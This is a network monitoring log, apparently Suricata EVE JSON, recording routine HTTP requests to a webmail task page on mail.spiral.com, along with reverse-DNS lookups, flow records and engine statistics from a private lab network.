{"timestamp":"2020-02-29T00:21:52.178406+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:21:52.181046+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:21:52.190156+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":2}} {"timestamp":"2020-02-29T00:21:52.190323+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52952,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.237320+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689}} 
{"timestamp":"2020-02-29T00:21:52.237346+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973}} {"timestamp":"2020-02-29T00:21:52.237512+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:21:54.001526+0000","flow_id":2182554981492520,"event_type":"flow","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":13,"bytes_toserver":2320,"bytes_toclient":11098,"start":"2020-02-29T00:20:47.780072+0000","end":"2020-02-29T00:20:53.446700+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:21:56.266138+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":3}} {"timestamp":"2020-02-29T00:21:56.275652+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28908,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:56.384455+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60566,"proto":"UDP","dns":{"type":"answer","id":28908,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:56.384455+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60566,"proto":"UDP","dns":{"type":"answer","id":28908,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:21:56.580929+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26101,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:56.692104+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35597,"proto":"UDP","dns":{"type":"answer","id":26101,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:56.692104+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35597,"proto":"UDP","dns":{"type":"answer","id":26101,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:57.194158+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52952,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/calendar.js","state":"CLOSED","stored":false,"size":3052,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:57.196504+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/task.js","state":"CLOSED","stored":false,"size":1698,"tx_id":2}} {"timestamp":"2020-02-29T00:21:58.000193+0000","event_type":"stats","stats":{"uptime":14970,"capture":{"kernel_packets":138459,"kernel_drops":0},"decoder":{"pkts":138517,"bytes":94977633,"invalid":193,"ipv4":136960,"ipv6":10,"ethernet":138517,"raw":0,"null":0,"sll":0,"tcp":131440,"udp":5312,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2857,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2873,"synack":2864,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":767,"ssh":0
,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2431,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2513}},"flow_mgr":{"closed_pruned":2830,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18762,"memcap":0}}} {"timestamp":"2020-02-29T00:22:01.001780+0000","flow_id":2248431190397810,"event_type":"flow","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1118,"start":"2020-02-29T00:20:55.119666+0000","end":"2020-02-29T00:21:00.317204+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:22:05.000272+0000","event_type":"stats","stats":{"uptime":14977,"capture":{"kernel_packets":138827,"kernel_drops":0},"decoder":{"pkts":138841,"bytes":95215515,"invalid":194,"ipv4":137282,"ipv6":10,"ethernet":138841,"raw":0,"null":0,"sll":0,"tcp":131757,"udp":5316,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2861,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2877,"synack":2868,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":771,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:12.000227+0000","event_type":"stats","stats":{"uptime":14984,"capture":{"kernel_packets":139063,"kernel_drops":0},"decoder":{"pkts":139073,"bytes":95413784,"invalid":194,"ipv4":137514,"ipv6":10,"ethernet":139073,"raw":0,"null":0,"sll":0,"tcp":131989,"udp":5316,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2863,"ssn_memcap_drop":0,"pseudo":349,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2879,"synack":2870,"rst":1210,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":773,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:19.000183+0000","event_type":"stats","stats":{"uptime":14991,"capture":{"kernel_packets":139166,"kernel_drops":0},"decoder":{"pkts":139172,"bytes":95498316,"invalid":194,"ipv4":137611,"ipv6":10,"ethernet":139172,"raw":0,"null":0,"sll":0,"tcp":132084,"udp":5318,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2864,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2880,"synack":2871,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":774,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":115},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:20.000826+0000","flow_id":1653011270062210,"event_type":"flow","src_ip":"192.168.10.122","src_port":44867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:19.118914+0000","end":"2020-02-29T00:17:19.227917+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:23.000273+0000","flow_id":24883672652726,"event_type":"flow","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":23,"pkts_toclient":30,"bytes_toserver":5358,"bytes_toclient":27904,"start":"2020-02-29T00:21:12.072630+0000","end":"2020-02-29T00:21:22.623690+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.001502+0000","flow_id":610635607832318,"event_type":"flow","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2355,"bytes_toclient":3607,"start":"2020-02-29T00:21:17.456446+0000","end":"2020-02-29T00:21:22.599465+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:22:23.002117+0000","flow_id":764176393698498,"event_type":"flow","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":11,"bytes_toserver":3359,"bytes_toclient":4267,"start":"2020-02-29T00:21:17.457922+0000","end":"2020-02-29T00:21:22.603314+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.002636+0000","flow_id":103172336909697,"event_type":"flow","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1322,"bytes_toclient":1842,"start":"2020-02-29T00:21:17.589185+0000","end":"2020-02-29T00:21:22.603381+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.003183+0000","flow_id":1543210446686322,"event_type":"flow","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1823,"bytes_toclient":2204,"start":"2020-02-29T00:21:17.591986+0000","end":"2020-02-29T00:21:22.601130+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:22:24.000896+0000","flow_id":1688526354854154,"event_type":"flow","src_ip":"192.168.10.122","src_port":34841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:23.536842+0000","end":"2020-02-29T00:17:23.645551+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:26.000158+0000","event_type":"stats","stats":{"uptime":14998,"capture":{"kernel_packets":139166,"kernel_drops":0},"decoder":{"pkts":139172,"bytes":95498316,"invalid":194,"ipv4":137611,"ipv6":10,"ethernet":139172,"raw":0,"null":0,"sll":0,"tcp":132084,"udp":5318,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2864,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2880,"synack":2871,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":774,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":115},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2836,"new_pruned":17,"est_pruned":2493,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checke
d":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":18282,"memcap":0}}} {"timestamp":"2020-02-29T00:22:27.010384+0000","flow_id":256953625804596,"event_type":"flow","src_ip":"192.168.10.122","src_port":54415,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:26.393012+0000","end":"2020-02-29T00:17:26.501632+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:28.003172+0000","flow_id":1424381571475841,"event_type":"flow","src_ip":"192.168.10.122","src_port":34842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:27.371073+0000","end":"2020-02-29T00:17:27.479187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:28.003571+0000","flow_id":1466579625143878,"event_type":"flow","src_ip":"192.168.10.122","src_port":60762,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:27.159302+0000","end":"2020-02-29T00:17:27.267472+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:29.476921+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41150,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59344,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:22:29.588304+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41150,"proto":"UDP","dns":{"type":"answer","id":59344,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:29.588304+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41150,"proto":"UDP","dns":{"type":"answer","id":59344,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:29.724003+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8088}} {"timestamp":"2020-02-29T00:22:30.000603+0000","flow_id":645583741745750,"event_type":"flow","src_ip":"192.168.10.122","src_port":51707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:29.293462+0000","end":"2020-02-29T00:17:29.401593+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 